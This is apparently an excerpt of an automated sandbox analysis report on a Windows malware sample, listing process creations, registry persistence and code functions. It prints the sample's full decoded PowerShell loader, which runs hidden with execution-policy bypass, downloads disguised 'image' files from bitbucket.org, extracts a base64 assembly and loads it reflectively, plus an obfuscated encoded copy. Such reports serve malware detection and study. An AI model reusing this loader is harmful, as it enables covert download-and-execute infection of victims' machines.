'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcub
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la'
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"Jump to behavior
        Source: nTHivMbGpg.exeStatic PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6FD211D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAACB42A83 push eax; iretd 5_2_00007FFAACB42A89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFAACB46041 push E85ABD31h; ret 5_2_00007FFAACB460F9
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD2115F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF6FD2115F4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
